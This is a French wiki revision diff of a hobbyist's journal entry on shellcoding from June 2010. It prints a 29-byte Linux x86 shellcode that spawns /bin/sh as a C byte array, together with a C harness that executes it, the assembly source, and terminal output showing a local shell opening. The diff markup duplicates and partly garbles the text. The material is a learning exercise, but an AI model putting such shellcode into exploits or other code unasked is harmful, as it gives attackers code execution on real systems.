« Hiteck » : différence entre les versions
Aucun résumé des modifications |
Aucun résumé des modifications |
||
| Ligne 5 : | Ligne 5 : | ||
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br /> | Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br /> | ||
#include <stdio.h><br /> | hiteck@hiteck:~/Bureau/exploits$ cat exploit.c<br /> | ||
/************************************************************************<br /> | |||
* Shellcode cree par hit3ck *<br /> | |||
* Pour tous renseignement : *<br /> | |||
*http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *<br /> | |||
* Disponible sur les canals de #hackbbs et #hzv *<br /> | |||
*************************************************************************/<br /> | |||
#include <stdio.h><br /><br /> | |||
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";<br /> | char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";<br /><br /> | ||
int main(void)<br /> | int main(void)<br /> | ||
{<br /> | {<br /> | ||
(*( | printf("***********************\n");<br /> | ||
printf("* Shellcode by hit3ck *\n");<br /> | |||
printf("***********************\n");<br /> | |||
printf("* taille : %d *\n",sizeof(shellcode)-1);<br /> | |||
printf("***********************\n");<br /> | |||
(*(void(*)()) shellcode)();<br /> | |||
}<br /> | |||
hiteck@hiteck:~/Bureau/exploits$ cat shell.s<br /> | |||
main:<br /> | |||
hiteck@hiteck:~/Bureau/exploits$ ./ | xorl %eax,%eax<br /> | ||
$ | xorl %ebx,%ebx<br /> | ||
xorl %ecx,%ecx<br /> | |||
$ | xorl %edx,%edx<br /> | ||
Local shellcode | push %edx<br /> | ||
$ | push $0x68732f6e<br /> | ||
hiteck@hiteck:~/Bureau/exploits$<br /> | push $0x69622f2f<br /> | ||
mov %esp,%ebx<br /> | |||
push %edx<br /> | |||
push %ebx<br /> | |||
mov %esp,%ecx<br /> | |||
mov $11,%al<br /> | |||
int $0x80<br /><br /> | |||
hiteck@hiteck:~/Bureau/exploits$ ./exploit<br /> | |||
***********************<br /> | |||
* Shellcode by hit3ck *<br /> | |||
***********************<br /> | |||
* taille : 29 *<br /> | |||
***********************<br /> | |||
$ whoami<br /> | |||
hiteck<br /> | |||
$ echo "Local exploit shellcode reussi :-D"<br /> | |||
Local exploit shellcode reussi :-D<br /> | |||
$ exit<br /> | |||
hiteck@hiteck:~/Bureau/exploits$<br /><br /> | |||
A la prochaine :-D | A la prochaine :-D | ||
</p> | </p> | ||
Version du 18 juin 2010 à 13:39
Shellcoding
Vendredi 18 juin 2010 :
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D
hiteck@hiteck:~/Bureau/exploits$ cat exploit.c
/************************************************************************
- Shellcode cree par hit3ck *
- Pour tous renseignement : *
- http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *
- Disponible sur les canals de #hackbbs et #hzv *
- /
- /
- include <stdio.h>
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
printf("***********************\n");
printf("* Shellcode by hit3ck *\n");
printf("***********************\n");
printf("* taille : %d *\n",sizeof(shellcode)-1);
printf("***********************\n");
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/exploits$ cat shell.s
main:
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
push %edx
push $0x68732f6e
push $0x69622f2f
mov %esp,%ebx
push %edx
push %ebx
mov %esp,%ecx
mov $11,%al
int $0x80
hiteck@hiteck:~/Bureau/exploits$ ./exploit
- Shellcode by hit3ck *
- taille : 29 *
$ whoami
hiteck
$ echo "Local exploit shellcode reussi :-D"
Local exploit shellcode reussi :-D
$ exit
hiteck@hiteck:~/Bureau/exploits$
A la prochaine :-D